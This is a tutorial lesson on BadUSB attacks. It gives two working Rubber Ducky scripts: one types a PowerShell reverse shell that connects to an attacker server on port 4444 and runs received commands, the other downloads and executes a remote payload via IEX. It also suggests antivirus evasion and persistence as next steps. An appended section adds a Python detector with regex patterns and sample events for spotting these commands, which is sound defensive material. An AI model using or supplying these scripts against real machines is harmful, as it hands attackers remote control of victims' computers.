Reverse Shell
Getting access to the shell of the target computer is probably the ultimate goal of an attacker. With a BadUSB, it’s possible to make the target computer connect back to the attacker and hand over a shell.
I based this lesson on the Hak5 Guide “A 3 Second Reverse Shell with the USB Rubber Ducky”.
I’m using a VPS to host the netcat server. You can also host it locally.
My BadUSB Script (extended version):
LOCALE DE
DELAY 5000
GUI r
DELAY 200
STRING powershell
ENTER
DELAY 200
STRING $sm=(New-Object Net.Sockets.TCPClient("YOUR_SERVER_IP",4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
ENTER
My BadUSB Script (short version):
LOCALE DE
DELAY 5000
GUI r
DELAY 200
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('LINK_TO_YOUR_PASTEBIN');"
ENTER
There are tons of ways to get a reverse shell. You can find plenty of other tutorials online. This example is just one simple way to do it. To improve the attack, you may want to look into ways of disabling antivirus software, malware obfuscation techniques, or how to make the reverse shell persistent. But that’s not part of this course.
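Added example (not part of the original lesson or the Hak5 guide): how the two scripts above look from the defending side. The short version carries its payload on the process command line, while the extended version is typed into an already open PowerShell window and is only visible when script block logging is enabled. The event fields and sample events below are constructed assumptions, not a real log schema.

```python
import re

# Indicators taken from the two scripts on this page (matched case-insensitively).
INDICATORS = {
    "tcp_client": re.compile(r"net\.sockets\.tcpclient", re.I),
    "download_string": re.compile(r"net\.webclient\b.*\.downloadstring", re.I),
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
}
# Either network primitive combined with dynamic evaluation is worth an alert.
NETWORK = {"tcp_client", "download_string"}


def match_indicators(text):
    """Return the set of indicator names found in a command line or script block."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def triage(events):
    """Return (event id, sorted indicator names) for every event that pairs a
    network primitive with Invoke-Expression."""
    alerts = []
    for ev in events:
        hits = match_indicators(ev["text"])
        if "invoke_expression" in hits and hits & NETWORK:
            alerts.append((ev["id"], sorted(hits)))
    return alerts


# Constructed sample events; "kind" and "parent" are hypothetical field names.
SAMPLE_EVENTS = [
    # Short version: the payload is in the process-creation command line.
    {"id": 1, "kind": "process", "parent": "explorer.exe",
     "text": "powershell \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p');\""},
    # Extended version: process creation only shows a bare "powershell" ...
    {"id": 2, "kind": "process", "parent": "explorer.exe", "text": "powershell"},
    # ... the typed one-liner (abbreviated here) appears only as a script block.
    {"id": 3, "kind": "scriptblock", "parent": "",
     "text": "$sm=(New-Object Net.Sockets.TCPClient(\"192.0.2.10\",4444)).GetStream();"
             "while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){$st=(iex $d 2>&1)}"},
    # Benign download without dynamic evaluation: must not alert.
    {"id": 4, "kind": "scriptblock", "parent": "",
     "text": "(New-Object Net.WebClient).DownloadString('http://example.invalid/v.txt') | Out-File v.txt"},
]

if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS):
        print(event_id, hits)
```

Event 2 is the reason command-line monitoring alone misses the extended version: without script block logging, the only trace is a PowerShell process started from the Run dialog.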